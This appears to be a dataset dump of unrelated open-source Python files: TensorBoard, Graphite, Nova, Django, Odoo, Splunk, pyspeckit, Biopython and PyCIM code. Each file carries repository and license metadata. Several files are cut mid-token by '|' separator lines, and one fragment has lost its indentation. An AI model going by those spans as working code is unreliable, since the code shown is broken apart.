earliest_time = self.last_update_time + (1.0 / FPS)
return time.time() >= earliest_time
def _update_frame(self, trainable, arrays, frame, config):
final_image = self._get_final_image(config, trainable, arrays, frame)
self._write_summary(final_image)
self.last_image_shape = final_image.shape
return final_image
def _update_recording(self, frame, config):
'''Adds a frame to the current video
|
output.'''
# pylint: disable=redefined-variable-type
shoul
|
d_record = config['is_recording']
if should_record:
if not self.is_recording:
self.is_recording = True
print('Starting recording using %s',
self.video_writer.current_output().name())
self.video_writer.write_frame(frame)
elif self.is_recording:
self.is_recording = False
self.video_writer.finish()
print('Finished recording')
    # TODO: blanket try and except for production? I don't want someone's script to die
# after weeks of running because of a visualization.
def update(self, trainable=None, arrays=None, frame=None):
'''Creates a frame and writes it to disk.
Args:
trainable: a list of namedtuple (tensors, name).
arrays: a list of namedtuple (tensors, name).
          frame: an image-like numpy array, used when config['values'] is 'frames'.
'''
new_config = self._get_config()
if True or self._enough_time_has_passed(self.previous_config['FPS']):
# self.visualizer.update(new_config)
self.last_update_time = time.time()
final_image = self._update_frame(
trainable, arrays, frame, new_config)
self._update_recording(final_image, new_config)
##############################################################################
# @staticmethod
# def gradient_helper(optimizer, loss, var_list=None):
# '''A helper to get the gradients out at each step.
# Args:
# optimizer: the optimizer op.
# loss: the op that computes your loss value.
# Returns: the gradient tensors and the train_step op.
# '''
# if var_list is None:
# var_list = tf.trainable_variables()
# grads_and_vars = optimizer.compute_gradients(loss, var_list=var_list)
# grads = [pair[0] for pair in grads_and_vars]
# return grads, optimizer.apply_gradients(grads_and_vars)
# implements pytorch backward later
class BeholderHook():
pass
# """SessionRunHook implementation that runs Beholder every step.
# Convenient when using tf.train.MonitoredSession:
# ```python
# beholder_hook = BeholderHook(LOG_DIRECTORY)
# with MonitoredSession(..., hooks=[beholder_hook]) as sess:
# sess.run(train_op)
# ```
# """
# def __init__(self, logdir):
# """Creates new Hook instance
# Args:
# logdir: Directory where Beholder should write data.
# """
# self._logdir = logdir
# self.beholder = None
#
|
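A minimal usage sketch for the Beholder class above. The import path is assumed from this file's location, and the log directory and array shapes are placeholders rather than values taken from the project.
# Hedged usage sketch: drive Beholder.update() from a toy loop.
import numpy as np
from tensorboardX.beholder.beholder import Beholder  # path assumed from the file shown above

beholder = Beholder(logdir='./runs')                   # placeholder log directory
params = [(np.random.rand(32, 32), 'layer1/weight')]   # (array, name) pairs, as update() expects
for step in range(5):
    frame = np.random.rand(64, 64)                     # 2D frames get expanded to HxWx1
    beholder.update(trainable=params, arrays=params, frame=frame)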
gwaldo/graphite-web
|
webapp/tests/test_readers_util.py
|
Python
|
apache-2.0
| 16,540
| 0.000665
|
from .base import TestCase
import os
import shutil
import time
from django.conf import settings
import whisper
import gzip
from graphite.readers import WhisperReader, FetchInProgress, MultiReader, merge_with_cache
from graphite.wsgi import application # NOQA makes sure we have a working WSGI app
from graphite.node import LeafNode
class MergeWithCacheTests(TestCase):
maxDiff = None
def test_merge_with_cache_with_different_step_no_data(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, None))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
            expected_values.append(None)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_sum(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
        # Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='sum'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(60)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_average(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='average'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_max(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='max'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_min(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='min'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_last(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
values = merge_with_cache(
cached_datapoints=cache_results,
start=start,
step=step,
values=values,
func='last'
)
# Generate the expected values
expected_values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
expected_values.append(1)
self.assertEqual(expected_values, values)
def test_merge_with_cache_with_different_step_bad(self):
# Data values from the Reader:
start = 1465844460 # (Mon Jun 13 19:01:00 UTC 2016)
window_size = 7200 # (2 hour)
step = 60 # (1 minute)
# Fill in half the data. Nones for the rest.
values = range(0, window_size/2, step)
for i in range(0, window_size/2, step):
values.append(None)
# Generate data that would normally come from Carbon.
# Step will be different since that is what we are testing
cache_results = []
for i in range(start+window_size/2, start+window_size, 1):
cache_results.append((i, 1))
# merge the db results with the cached results
with self.asse
|
ChinaMassClouds/copenstack-server
|
openstack/src/nova-2014.2/nova/cells/weights/ram_by_instance_type.py
|
Python
|
gpl-2.0
| 1,971
| 0
|
# Copyright (c) 2012-2013 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Weigh cells by memory needed in a way that spreads instances.
"""
from oslo.config import cfg
from nova.cells import weights
ram_weigher_opts = [
cfg.FloatOpt('ram_weight_multiplier',
default=10.0,
help='Multiplier used for weighing ram. Negative '
'numbers mean to stack vs spread.'),
]
CONF = cfg.CONF
CONF.register_opts(ram_weigher_opts, group='cells')
class RamByInstanceTypeWeigher(weights.BaseCellWeigher):
    """Weigh cells by instance_type requested."""
def weight_multiplier(self):
return CONF.cells.ram_weight_multiplier
def _weigh_object(self, cell, weight_properties):
"""Use the 'ram_free' for a particular instance_type advertised from a
child cell's capacity to compute a weight. We want to direct the
build to a cell with a higher capacity. Since higher weights win,
we just return the number of units available for the instance_type.
"""
request_spec = weight_properties['request_spec']
instance_type = request_spec['instance_type']
memory_needed = instance_type['memory_mb']
ram_free = cell.capacities.get('ram_free', {})
units_by_mb = ram_free.get('units_by_mb', {})
return units_by_mb.get(str(memory_needed), 0)
|
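A small worked example of the lookup performed by _weigh_object above; the capacity figures are invented for illustration.
# Invented capacities: this cell can still fit 11 instances of a 2048 MB flavor.
ram_free = {'units_by_mb': {'512': 80, '2048': 11}}
memory_needed = 2048
weight = ram_free.get('units_by_mb', {}).get(str(memory_needed), 0)
print(weight)  # 11; the scheduler then scales it by ram_weight_multiplier (10.0 by default)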
Daishi1223/py-http-realip
|
http_realip/middlewares.py
|
Python
|
mit
| 1,364
| 0.002933
|
from django.conf import settings
from .func import (check_if_trusted,
get_from_X_FORWARDED_FOR as _get_from_xff,
get_from_X_REAL_IP)
trusted_list = (settings.REAL_IP_TRUSTED_LIST
if hasattr(settings, 'REAL_IP_TRUSTED_LIST')
else [])
def get_from_X_FORWARDED_FOR(header):
return _get_from_xff(header, trusted_list)
func_map = {'HTTP_X_REAL_IP': get_from_X_REAL_IP,
'HTTP_X_FORWARDED_FOR': get_from_X_FORWARDED_FOR}
real_ip_headers = (settings.REAL_IP_HEADERS
if hasattr(settings, 'REAL_IP_HEADERS')
else ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR'])
class DjangoRealIPMiddleware(object):
    def process_request(self, request):
if not check_if_trusted(request.META['REMOTE_ADDR'], trusted_list):
# Only header from trusted ip can be used
return
for header_name in real_ip_headers:
try:
# Get the parsing function
func = func_map[header_name]
# Get the header value
header = request.META[header_name]
except KeyError:
                continue
# Parse the real ip
real_ip = func(header)
if real_ip:
request.META['REMOTE_ADDR'] = real_ip
break
|
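A hedged Django settings sketch for the middleware above; the addresses are placeholders, and only the setting names that already appear in the code (REAL_IP_TRUSTED_LIST, REAL_IP_HEADERS) are assumed.
# settings.py sketch (placeholder values):
REAL_IP_TRUSTED_LIST = ['127.0.0.1', '10.0.0.5']              # proxies allowed to set the headers
REAL_IP_HEADERS = ['HTTP_X_REAL_IP', 'HTTP_X_FORWARDED_FOR']  # checked in this order
MIDDLEWARE_CLASSES = [
    'http_realip.middlewares.DjangoRealIPMiddleware',
    # ... remaining middleware
]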
HBEE/odoo-addons
|
project_analytic_integration/__openerp__.py
|
Python
|
agpl-3.0
| 1,908
| 0.002096
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2015 ADHOC SA (http://www.adhoc.com.ar)
# All Rights Reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Project and Analytic Account integration improvements',
'version': '8.0.1.0.0',
'category': 'Projects & Services',
'sequence': 14,
'summary': '',
'description': """
Project and Analytic Account integration improvements.
=======================================================
Adds domain restrictions to project tasks so that only projects that use tasks and are not in a cancelled, done or template state can be chosen.
Adds domain restrictions to timesheet records so that only
""",
'author': 'ADHOC SA',
'website': 'www.adhoc.com.ar',
'images': [
],
'depends': [
'project_timesheet',
'hr_timesheet_invoice',
],
'data': [
'project_timesheet_view.xml',
],
'demo': [
],
'test': [
],
'installable': True,
'auto_install': False,
'application': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
skywalka/splunk-for-nagios
|
bin/livehostsdownstatus.py
|
Python
|
gpl-3.0
| 1,840
| 0.044565
|
# Script to request hosts with DOWN status and total hosts by accessing MK Livestatus
# Required field to be passed to this script from Splunk: n/a
import socket,string,sys,re,splunk.Intersplunk,mklivestatus
results = []
try:
results,dummyresults,settings = splunk.Intersplunk.getOrganizedResults()
for r in results:
try:
HOST = mklivestatus.HOST
PORT = mklivestatus.PORT
s = None
livehostsdown = 0
livehoststotal = 0
for h in HOST:
content = [ "GET hosts\nStats: state = 1\nStats: state != 9999\n" ]
|
query = "".join(content)
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((h, PORT))
except socket.error, (value,message):
if s:
s.close()
#Error: Could not open socket: connection refused (MK Livestatus not setup in xinetd?)
break
s.send(query)
s.shutdown(socket.SHUT_WR)
data = s.recv(100000000)
data2 = (re.findall(r'(No UNIX socket)', data))
if data2:
                #Error: MK Livestatus module not loaded?
s.close()
else:
livehosts2 = data.strip()
livehosts = livehosts2.split(";")
s.close()
livehostsdownind = int(livehosts[0])
livehoststotalind = int(livehosts[1])
livehostsdown = livehostsdown + livehostsdownind
livehoststotal = livehoststotal + livehoststotalind
r["livehostsdownstatus"] = livehostsdown
r["livehoststotalstatus"] = livehoststotal
except:
r["livehostsdownstatus"] = "0"
r["livehoststotalstatus"] = "0"
except:
import traceback
stack = traceback.format_exc()
results = splunk.Intersplunk.generateErrorResults("Error : Traceback: " + str(stack))
splunk.Intersplunk.outputResults( results )
|
jpinedaf/pyspeckit
|
examples/example_pNH2D.py
|
Python
|
mit
| 1,329
| 0.017306
|
import pyspeckit
import os
from pyspeckit.spectrum.models import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
    f = aud.download_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
# Load the spectrum
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
# Determine rms from line free section and load into cube
rms = np.std(spec.data[10:340])
spec.error[:] = rms
# setup spectral axis
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
# define useful shortcuts for True and False
F=False
T=True
# Setup of matplotlib
import matplotlib.pyplot as plt
plt.ion()
# Add NH2D fitter
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
# run spectral fit using some reasonable guesses
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
# plot best fit
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
#save figure
plt.savefig('example_p-NH2D.png')
|
Serulab/Py4Bio
|
code/ch20/estimateintrons.py
|
Python
|
mit
| 4,302
| 0.006044
|
#!/usr/bin/env python
import argparse
import os
import sqlite3
from Bio import SeqIO, SeqRecord, Seq
from Bio.Align.Applications import ClustalwCommandline
from Bio.Blast import NCBIXML
from Bio.Blast.Applications import NcbiblastnCommandline as bn
from Bio import AlignIO
AT_DB_FILE = 'AT.db'
BLAST_EXE = '~/opt/ncbi-blast-2.6.0+/bin/blastn'
BLAST_DB = '~/opt/ncbi-blast-2.6.0+/db/TAIR10'
CLUSTALW_EXE = '../../clustalw2'
def allgaps(seq):
"""Return a list with tuples containing all gap positions
and length. seq is a string."""
gaps = []
indash = False
for i, c in enumerate(seq):
if indash is False and c == '-':
c_ini = i
indash = True
dashn = 0
elif indash is True and c == '-':
dashn += 1
elif indash is True and c != '-':
indash = False
gaps.append((c_ini, dashn+1))
return gaps
def iss(user_seq):
"""Infer Splicing Sites from a FASTA file full of EST
sequences"""
with open('forblast','w') as forblastfh:
forblastfh.write(str(user_seq.seq))
blastn_cline = bn(cmd=BLAST_EXE, query='forblast',
db=BLAST_DB, evalue='1e-10', outfmt=5,
num_descriptions='1',
num_alignments='1', out='outfile.xml')
blastn_cline()
b_record = NCBIXML.read(open('outfile.xml'))
title = b_record.alignments[0].title
sid = title[title.index(' ')+1 : title.index(' |')]
# Polarity information of returned sequence.
# 1 = normal, -1 = reverse.
frame = b_record.alignments[0].hsps[0].frame[1]
# Run the SQLite query
conn = sqlite3.connect(AT_DB_FILE)
c = conn.cursor()
res_cur = c.execute('SELECT CDS, FULL_SEQ from seq '
'WHERE ID=?', (sid,))
cds, full_seq = res_cur.fetchone()
if cds=='':
print('There is no matching CDS')
exit()
# Check sequence polarity.
sidcds = '{0}-CDS'.format(sid)
sidseq = '{0}-SEQ'.format(sid)
if frame==1:
seqCDS = SeqRecord.SeqRecord(Seq.Seq(cds),
id = sidcds,
name = '',
description = '')
fullseq = SeqRecord.SeqRecord(Seq.Seq(full_seq),
id = sidseq,
name='',
description='')
else:
seqCDS = SeqRecord.SeqRecord(
Seq.Seq(cds).reverse_complement(),
id = sidcds, name='', description='')
fullseq = SeqRecord.SeqRecord(
Seq.Seq(full_seq).reverse_complement(),
id = sidseq, name = '', description='')
# A tuple with the user sequence and both AT sequences
allseqs = (record, seqCDS, fullseq)
with open('foralig.txt','w') as trifh:
# Write the file with the three sequences
SeqIO.write(allseqs, trifh, 'fasta')
# Do the alignment:
outfilename = '{0}.aln'.format(user_seq.id)
cline = ClustalwCommandline(CLUSTALW_EXE,
infile = 'foralig.txt',
outfile = outfilename,
)
cline()
# Walk over all sequences and look for query sequence
for seq in AlignIO.read(outfilename, 'clustal'):
if user_seq.id in seq.id:
seqstr = str(seq.seq)
gaps = allgaps(seqstr.strip('-'))
break
print('Original sequence: {0}'.format(user_seq.id))
print('\nBest match in AT CDS: {0}'.format(sid))
acc = 0
for i, gap in enumerate(gaps):
print('Putative intron #{0}: Start at position {1}, '
'length {2}'.format(i+1, gap[0]-acc, gap[1]))
acc += gap[1]
print('\n{0}'.format(seqstr.strip('-')))
print('\nAlignment file: {0}\n'.format(outfilename))
description = 'Program to infer intron position based on ' \
'Arabidopsis Thaliana genome'
parser = argparse.ArgumentParser(description=description)
ifh = 'Fasta formated file with sequence to search for introns'
parser.add_argument('input_file', help=ifh)
args = parser.parse_args()
seqhandle = open(args.input_file)
records = SeqIO.parse(seqhandle, 'fasta')
for record in records:
iss(record)
|
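A quick worked example of allgaps() from the script above (assuming the function is in scope): gaps are reported as (start index, run length), and a trailing dash run is not reported.
# 'AC--GT---A' has dash runs at indices 2-3 and 6-8.
print(allgaps('AC--GT---A'))  # -> [(2, 2), (6, 3)]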
rwl/PyCIM
|
CIM15/IEC61970/LoadModel/Season.py
|
Python
|
mit
| 3,209
| 0.002805
|
# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM15.Element import Element
class Season(Element):
    """A specified time period of the year, e.g., Spring, Summer, Fall, Winter
"""
def __init__(self, name="winter", startDate='', endDate='', SeasonDayTypeSchedules=None, *args, **kw_args):
"""Initialises a new 'Season' instance.
@param name: Name of the Season Values are: "winter", "summer", "fall", "spring"
@param startDate: Date season starts
@param endDate: Date season ends
@param SeasonDayTypeSchedules: Schedules that use this Season.
"""
#: Name of the Season Values are: "winter", "summer", "fall", "spring"
self.name = name
#: Date season starts
self.startDate = startDate
#: Date season ends
self.endDate = endDate
self._SeasonDayTypeSchedules = []
self.SeasonDayTypeSchedules = [] if SeasonDayTypeSchedules is None else SeasonDayTypeSchedules
super(Season, self).__init__(*args, **kw_args)
_attrs = ["name", "startDate", "endDate"]
_attr_types = {"name": str, "startDate": str, "endDate": str}
_defaults = {"name": "winter", "startDate": '', "endDate": ''}
    _enums = {"name": "SeasonName"}
_refs = ["SeasonDayTypeSchedules"]
_many_refs = ["SeasonDayTypeSchedules"]
def getSeasonDayTypeSchedules(self):
"""Schedules that use this Season.
"""
|
return self._SeasonDayTypeSchedules
def setSeasonDayTypeSchedules(self, value):
for x in self._SeasonDayTypeSchedules:
x.Season = None
for y in value:
y._Season = self
self._SeasonDayTypeSchedules = value
SeasonDayTypeSchedules = property(getSeasonDayTypeSchedules, setSeasonDayTypeSchedules)
def addSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = self
def removeSeasonDayTypeSchedules(self, *SeasonDayTypeSchedules):
for obj in SeasonDayTypeSchedules:
obj.Season = None
|
Twinstar2/Python_Master_scripts
|
data_mining/extract_all_targz_in_dir.py
|
Python
|
mit
| 2,292
| 0.004363
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import argparse
import shutil
import urllib2
from contextlib import closing
from os.path import basename
import gzip
import tarfile
# argparse for information
parser = argparse.ArgumentParser()
parser.add_argument("-d", "--directory", help="input directory")
parser.add_argument("-r", "--remove", action="store_true", help="removes the .gz file after extracting")
args = parser.parse_args()
# sanity check
if not len(sys.argv) > 1:
    print "This script extracts all .gz files (not yet .tar) in a given directory, including subdirectories."
    print "Which directory (including subdirectories) would you like to extract?"
parser.print_help()
sys.exit(0)
input = args.directory
# in case of an extraction error caused by a download error, reload the file
def reload_file(file, dirpath):
print "reloading file: " + file
print 'ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file
with closing(urllib2.urlopen('ftp://ftp.rcsb.org/pub/pdb/data/structures/divided/' + dirpath + "/" + file)) as r:
with open(dirpath + "/" + file, 'wb') as reloaded_file:
shutil.copyfileobj(r, reloaded_file)
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
for dirpath, dir, files in os.walk(top=input):
for file in files:
if ".gz" in file:
print "extracting: " + (os.path.join(dirpath, file))
|
try:
|
with gzip.open((os.path.join(dirpath, file)), 'rb') as f:
file_content = f.read()
extracted_file = open((os.path.join(dirpath, os.path.splitext(file)[0])), 'w')
extracted_file.write(file_content)
extracted_file.close()
# tar = tarfile.open(os.path.join(dirpath, file))
# tar.extractall(path=dirpath)
# tar.close()
except:
reload_file(file, dirpath)
if args.remove:
os.remove(os.path.join(dirpath, file))
print "Extraction finished"
|
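Example invocation of the script above, using the two flags defined by its argparse block; the directory name is a placeholder.
# From a shell (path is a placeholder):
#   python extract_all_targz_in_dir.py -d ./pdb_mirror -r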
vleo/vleo-notebook
|
test_python/multiprocessing/test_multiprocessing.py
|
Python
|
gpl-3.0
| 811
| 0.014797
|
from multiprocessing import Process,Queue
import os
class TestMP:
def __init__(self,n):
self.n = n
@staticmethod
def worker(q):
"""worker function"""
# print('worker',*args)
# print("ppid= {} pid= {}".format(os.getppid(),os.getpid()))
q.put([1,'x',(os.getpid(),[])])
        return
def main(self):
if __name__ == '__main__':
jobs = []
            for i in range(self.n):
q = Queue()
p = Process(target=self.worker,args=(q,))
jobs.append((p,q))
p.start()
for i in range(self.n):
j=jobs.pop(0)
j[0].join()
msg = j[1].get()
print("job no {} ended, msg: {}".format(i,msg))
m=TestMP(10)
m.main()
|
Vvucinic/Wander
|
venv_2_7/lib/python2.7/site-packages/Django-1.9-py2.7.egg/django/db/backends/oracle/base.py
|
Python
|
artistic-2.0
| 24,995
| 0.00164
|
"""
Oracle database backend for Django.
Requires cx_Oracle: http://cx-oracle.sourceforge.net/
"""
from __future__ import unicode_literals
import datetime
import decimal
import os
import platform
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.base.validation import BaseDatabaseValidation
from django.utils import six, timezone
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.duration import duration_string
from django.utils.encoding import force_bytes, force_text
from django.utils.functional import cached_property
def _setup_environment(environ):
# Cygwin requires some special voodoo to set the environment variables
# properly so that Oracle will see them.
if platform.system().upper().startswith('CYGWIN'):
try:
import ctypes
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading ctypes: %s; "
"the Oracle backend requires ctypes to "
"operate correctly under Cygwin." % e)
kernel32 = ctypes.CDLL('kernel32')
for name, value in environ:
kernel32.SetEnvironmentVariableA(name, value)
else:
os.environ.update(environ)
_setup_environment([
# Oracle takes client-side character set encoding from the environment.
('NLS_LANG', '.UTF8'),
# This prevents unicode from getting mangled by getting encoded into the
# potentially non-unicode database character set.
('ORA_NCHAR_LITERAL_REPLACE', 'TRUE'),
])
try:
import cx_Oracle as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
# Some of these import cx_Oracle, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .utils import Oracle_datetime, convert_unicode # isort:skip
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
class _UninitializedOperatorsDescriptor(object):
def __get__(self, instance, owner):
# If connection.operators is looked up before a connection has been
# created, transparently initialize connection.operators to avert an
# AttributeError.
if instance is None:
raise AttributeError("operators not available as class attribute")
# Creating a cursor will initialize the operators.
instance.cursor().close()
return instance.__dict__['operators']
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'oracle'
# This dictionary maps Field objects to their associated Oracle column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
#
# Any format strings starting with "qn_" are quoted before being used in the
    # output (the "qn_" prefix is stripped before the lookup is performed).
data_types = {
'AutoField': 'NUMBER(11)',
'BinaryField': 'BLOB',
'BooleanField': 'NUMBER(1)',
'CharField': 'NVARCHAR2(%(max_length)s)',
'CommaSeparatedIntegerField': 'VARCHAR2(%(max_length)s)',
'DateField': 'DATE',
'DateTimeField': 'TIMESTAMP',
'DecimalField': 'NUMBER(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'INTERVAL DAY(9) TO SECOND(6)',
'FileField': 'NVARCHAR2(%(max_length)s)',
'FilePathField': 'NVARCHAR2(%(max_length)s)',
'FloatField': 'DOUBLE PRECISION',
'IntegerField': 'NUMBER(11)',
'BigIntegerField': 'NUMBER(19)',
'IPAddressField': 'VARCHAR2(15)',
'GenericIPAddressField': 'VARCHAR2(39)',
'NullBooleanField': 'NUMBER(1)',
'OneToOneField': 'NUMBER(11)',
'PositiveIntegerField': 'NUMBER(11)',
'PositiveSmallIntegerField': 'NUMBER(11)',
'SlugField': 'NVARCHAR2(%(max_length)s)',
'SmallIntegerField': 'NUMBER(11)',
'TextField': 'NCLOB',
'TimeField': 'TIMESTAMP',
'URLField': 'VARCHAR2(%(max_length)s)',
'UUIDField': 'VARCHAR2(32)',
}
data_type_check_constraints = {
'BooleanField': '%(qn_column)s IN (0,1)',
'NullBooleanField': '(%(qn_column)s IN (0,1)) OR (%(qn_column)s IS NULL)',
'PositiveIntegerField': '%(qn_column)s >= 0',
'PositiveSmallIntegerField': '%(qn_column)s >= 0',
}
operators = _UninitializedOperatorsDescriptor()
_standard_operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'icontains': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'endswith': "LIKE TRANSLATE(%s USING NCHAR_CS) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
'istartswith': "LIKE UPPER(TRANSLATE(%s USING NCHAR_CS)) ESCAPE TRANSLATE('\\' USING NCHAR_CS)",
